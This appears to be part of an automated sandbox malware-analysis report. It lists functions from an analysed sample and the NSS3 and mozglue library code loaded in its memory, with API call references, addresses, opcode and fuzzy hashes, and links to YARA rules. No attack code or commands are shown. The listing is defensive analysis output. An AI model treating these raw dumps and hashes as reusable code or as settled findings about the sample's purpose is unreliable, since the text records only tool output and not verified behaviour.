API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 47ab576f6f84f56d44c153ac54188a4829235abff13e68d5d2ba75d1741ea4d6
Instruction ID: 77090cced59b12641a8ce354d9c22e50962ee3f4103a1868ec4c80176ef574e7
Opcode Fuzzy Hash: 47ab576f6f84f56d44c153ac54188a4829235abff13e68d5d2ba75d1741ea4d6
Instruction Fuzzy Hash: 4C3126B6B402059BEB10AF28DC84C6AB774FF45259B058274ED5887B11FB31EC64CBD1

Function 6C3F8C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C3F8C1B
EnterCriticalSection.KERNEL32 ref: 6C3F8C34
PL_ArenaAllocate.NSS3 ref: 6C3F8C65
PR_Unlock.NSS3 ref: 6C3F8C9C
PR_Unlock.NSS3 ref: 6C3F8CB6

Part of subcall function 6C48DD70: TlsGetValue.KERNEL32 ref: 6C48DD8C
Part of subcall function 6C48DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C48DDB4

Strings

KRAM, xrefs: 6C3F8C8F

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
String ID: KRAM
API String ID: 4127063985-3815160215
Opcode ID: f0792b2b92d30840631b753180f37bf19776d4fad89349fe2b050ae31f4e7ba9
Instruction ID: 440d146d940b3435d8a6e06fa6aa3597e0a3ea346a7d4a206a5df2421f78ee81
Opcode Fuzzy Hash: f0792b2b92d30840631b753180f37bf19776d4fad89349fe2b050ae31f4e7ba9
Instruction Fuzzy Hash: D72180B16056018FD704AF39C494959FBF4FF46308F05896ED8988B711EB31E886CF92

Function 6C4F2C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C4F2CA0
PR_ExitMonitor.NSS3 ref: 6C4F2CBE
calloc.MOZGLUE(00000001,00000014), ref: 6C4F2CD1
strdup.MOZGLUE(?), ref: 6C4F2CE1
PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C4F2D27

Strings

Loaded library %s (static lib), xrefs: 6C4F2D22

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Monitor$EnterExitPrintcallocstrdup
String ID: Loaded library %s (static lib)
API String ID: 3511436785-2186981405
Opcode ID: 40cd7ec97e6d5d7c28d5fd9aee5381d290951008da00a51cf0a5bf30c0553e77
Instruction ID: de4b8ff68d3517345b98f1b72d37c85cfc132e2995dcb027553785d163acaf9e
Opcode Fuzzy Hash: 40cd7ec97e6d5d7c28d5fd9aee5381d290951008da00a51cf0a5bf30c0553e77
Instruction Fuzzy Hash: 2C11E6B16012909FEB20DF15DC44E6677B4EB8534EF05812DD819C7B41EB32E81ACBA5

Function 6C3EBDC0 Relevance: 10.6, APIs: 7, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C3EBDCA

Part of subcall function 6C440FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3E87ED,00000800,6C3DEF74,00000000), ref: 6C441000
Part of subcall function 6C440FF0: PR_NewLock.NSS3(?,00000800,6C3DEF74,00000000), ref: 6C441016
Part of subcall function 6C440FF0: PL_InitArenaPool.NSS3(00000000,security,6C3E87ED,00000008,?,00000800,6C3DEF74,00000000), ref: 6C44102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C3EBDDB

Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C4410F3
Part of subcall function 6C4410C0: EnterCriticalSection.KERNEL32(?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44110C
Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441141
Part of subcall function 6C4410C0: PR_Unlock.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441182
Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C3EBDEC

Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44116E

SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6C3EBE03

Part of subcall function 6C43FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C438D2D,?,00000000,?), ref: 6C43FB85
Part of subcall function 6C43FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C43FBB1

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C3EBE22
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C3EBE30
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C3EBE3B

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1821307800-0
Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction ID: 37e8531fbbc78c1d4e175aec54361bc41609e264eb230315e802ceccae4d09cf
Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
Instruction Fuzzy Hash: 9B012BA5A4132166F61152667C01F6B694C8F9028DF24013AEF049EBC2FB51E52887F9

Function 006312A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 006312EB
DName::operator+.LIBCMT ref: 006312F2
DName::DName.LIBCMT ref: 00631314
DName::operator+.LIBCMT ref: 0063131B
DName::operator+.LIBCMT ref: 00631322

Strings

throw(, xrefs: 006312E3, 0063130C

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: c86ed08e13d3ddf6ac61728da5d166180cbd787ed64a659905893aa1e885b396
Instruction ID: 4686bc4dd38c9a8e3339019fd3ff6351051a599291a4d0863a3c701ea632e0e2
Opcode Fuzzy Hash: c86ed08e13d3ddf6ac61728da5d166180cbd787ed64a659905893aa1e885b396
Instruction Fuzzy Hash: 3C014034A00209ABDF14EBA4DC56EED7BB6EB49704F404098F9019B291DA70D9468BC4

Function 6C471C60 Relevance: 10.5, APIs: 7, Instructions: 49COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C471C74

Part of subcall function 6C48C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C48C2BF

DeleteCriticalSection.KERNEL32(?), ref: 6C471C92
free.MOZGLUE(?), ref: 6C471C99
DeleteCriticalSection.KERNEL32(?), ref: 6C471CCB
free.MOZGLUE(?), ref: 6C471CD2

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree$ErrorValue
String ID:
API String ID: 3805613680-0
Opcode ID: a1a80b315e389c1f66bc1717da184da559a7ffa252c07e971cad7d451b8ab63c
Instruction ID: f1e427f76700a00b4f4bf3bdbaac6f97719062165dd19333076fe48bce1ac5a5
Opcode Fuzzy Hash: a1a80b315e389c1f66bc1717da184da559a7ffa252c07e971cad7d451b8ab63c
Instruction Fuzzy Hash: 170184B1E052306FDA30FFA49C0EF893778A70631DF924225E90EE6B40E761E14547A9

Function 6C44ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C44ED6B
PORT_Alloc_Util.NSS3(00000000), ref: 6C44EDCE

Part of subcall function 6C440BE0: malloc.MOZGLUE(6C438D2D,?,00000000,?), ref: 6C440BF8
Part of subcall function 6C440BE0: TlsGetValue.KERNEL32(6C438D2D,?,00000000,?), ref: 6C440C15

free.MOZGLUE(00000000,?,?,?,?,6C44B04F), ref: 6C44EE46
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C44EECA
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C44EEEA
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C44EEFB

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Alloc_Util$Arena$Valuefreemalloc
String ID:
API String ID: 3768380896-0
Opcode ID: 269b01e171e19286e6362120afa1edb2eb4f3dfaf7544b72b7ce77dfee70e91e
Instruction ID: b6369d7c130aeb4e6b8f46dd7950e11fa753d66acbf532bad3836bef5c948b75
Opcode Fuzzy Hash: 269b01e171e19286e6362120afa1edb2eb4f3dfaf7544b72b7ce77dfee70e91e
Instruction Fuzzy Hash: 72815AB5A012059FEB14CF55D880FAAB7F5EF88309F24842CE9159BB51EB31E815CBE1

Function 6C44CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C44C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C44DAE2,?), ref: 6C44C6C2

PR_Now.NSS3 ref: 6C44CD35

Part of subcall function 6C4A9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C4F0A27), ref: 6C4A9DC6
Part of subcall function 6C4A9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C4F0A27), ref: 6C4A9DD1
Part of subcall function 6C4A9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C4A9DED

Part of subcall function 6C436C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C3E1C6F,00000000,00000004,?,?), ref: 6C436C3F

PR_GetCurrentThread.NSS3 ref: 6C44CD54

Part of subcall function 6C4A9BF0: TlsGetValue.KERNEL32(?,?,?,6C4F0A75), ref: 6C4A9C07

Part of subcall function 6C437260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C3E1CCC,00000000,00000000,?,?), ref: 6C43729F

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C44CD9B
PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C44CE0B
PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C44CE2C

Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C4410F3
Part of subcall function 6C4410C0: EnterCriticalSection.KERNEL32(?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44110C
Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441141
Part of subcall function 6C4410C0: PR_Unlock.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441182
Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44119C

PORT_ArenaMark_Util.NSS3(00000000), ref: 6C44CE40

Part of subcall function 6C4414C0: TlsGetValue.KERNEL32 ref: 6C4414E0
Part of subcall function 6C4414C0: EnterCriticalSection.KERNEL32 ref: 6C4414F5
Part of subcall function 6C4414C0: PR_Unlock.NSS3 ref: 6C44150D

Part of subcall function 6C44CEE0: PORT_ArenaMark_Util.NSS3(?,6C44CD93,?), ref: 6C44CEEE
Part of subcall function 6C44CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C44CD93,?), ref: 6C44CEFC
Part of subcall function 6C44CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C44CD93,?), ref: 6C44CF0B
Part of subcall function 6C44CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C44CD93,?), ref: 6C44CF1D

Part of subcall function 6C44CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C44CD93,?), ref: 6C44CF47
Part of subcall function 6C44CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C44CD93,?), ref: 6C44CF67
Part of subcall function 6C44CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C44CD93,?,?,?,?,?,?,?,?,?,?,?,6C44CD93,?), ref: 6C44CF78

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
String ID:
API String ID: 3748922049-0
Opcode ID: 24b0c2815e6671a23952b6454166499f66976b6f2885b39dfc3c4598b801c406
Instruction ID: 5cc6a4535854c480bb80e3dfcb049551475ca42833635f80a3229140c8042381
Opcode Fuzzy Hash: 24b0c2815e6671a23952b6454166499f66976b6f2885b39dfc3c4598b801c406
Instruction Fuzzy Hash: 4851B1B6A001149BFB10EF69DC40FAA73E4EF48349F398528D94997B41FB31E909CB91

Function 00624EA7 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00624EC6
StrCmpCA.SHLWAPI(00000000,00647818), ref: 00624EFF
strtok_s.MSVCRT ref: 00624FBF

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: d7fa23d4f9a7da0de71585251a56872c98828e88c2c6d2b08f0f33d6c625b003
Instruction ID: 79bef5f49c6424aff69d99b6ff2d12b5508b5e54e8e6323f162a6a7d8dfc0c55
Opcode Fuzzy Hash: d7fa23d4f9a7da0de71585251a56872c98828e88c2c6d2b08f0f33d6c625b003
Instruction Fuzzy Hash: A931E271E046219FCB148F24EE44BA9BBA9FFD9719F115069E905EB192EF38CA418F40

Function 6C473C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C475B40: PR_GetIdentitiesLayer.NSS3 ref: 6C475B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C473D3F

Part of subcall function 6C3EBA90: PORT_NewArena_Util.NSS3(00000800,6C473CAF,?), ref: 6C3EBABF
Part of subcall function 6C3EBA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6C473CAF,?), ref: 6C3EBAD5
Part of subcall function 6C3EBA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6C473CAF,?), ref: 6C3EBB08
Part of subcall function 6C3EBA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C473CAF,?), ref: 6C3EBB1A
Part of subcall function 6C3EBA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6C473CAF,?), ref: 6C3EBB3B

PR_EnterMonitor.NSS3(?), ref: 6C473CCB

Part of subcall function 6C4A9090: TlsGetValue.KERNEL32 ref: 6C4A90AB
Part of subcall function 6C4A9090: TlsGetValue.KERNEL32 ref: 6C4A90C9
Part of subcall function 6C4A9090: EnterCriticalSection.KERNEL32 ref: 6C4A90E5
Part of subcall function 6C4A9090: TlsGetValue.KERNEL32 ref: 6C4A9116
Part of subcall function 6C4A9090: LeaveCriticalSection.KERNEL32 ref: 6C4A913F

PR_EnterMonitor.NSS3(?), ref: 6C473CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C473CF8
PR_ExitMonitor.NSS3(?), ref: 6C473D15
PR_ExitMonitor.NSS3(?), ref: 6C473D2E

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: e0e861d330a868bf66973309b3eadf83ea3e9fd685d06b737f2900872b29cd24
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: 6311E675A106006FE731DA65FC41FDBB6E4AB21249F504538E90A8BB20E733E819C6A2

Function 6C43FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C43FE08

Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C4410F3
Part of subcall function 6C4410C0: EnterCriticalSection.KERNEL32(?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44110C
Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441141
Part of subcall function 6C4410C0: PR_Unlock.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441182
Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C43FE1D

Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C43FE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C43FE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C43FE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6C43FE6F

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: 06c38ff4be773e2fd1ca1f32e61df1bb94da84762069b6e72cf662460d9f8a4b
Instruction ID: 421e3ee1dc3b4d59cf434d3cef8cae22aabf8b6928d59800cdfb1089a13056e8
Opcode Fuzzy Hash: 06c38ff4be773e2fd1ca1f32e61df1bb94da84762069b6e72cf662460d9f8a4b
Instruction Fuzzy Hash: B41129B66026116BFB00CB56DC41E5B73A8EFA829AF208038E81C8BB52E731D914C7D1

Function 6C4EFD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6C4EFD9E

Part of subcall function 6C4A9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C3D1A48), ref: 6C4A9BB3
Part of subcall function 6C4A9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C3D1A48), ref: 6C4A9BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6C4EFDB9

Part of subcall function 6C3CA900: TlsGetValue.KERNEL32(00000000,?,6C5414E4,?,6C364DD9), ref: 6C3CA90F
Part of subcall function 6C3CA900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6C3CA94F

PR_Unlock.NSS3 ref: 6C4EFDD4
PR_Lock.NSS3 ref: 6C4EFDF2
PR_NotifyAllCondVar.NSS3 ref: 6C4EFE0D
PR_Unlock.NSS3 ref: 6C4EFE23

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: 1121000fab4ae4b7b46dacaf05a59839db540d315217b281d27a86876e0e8904
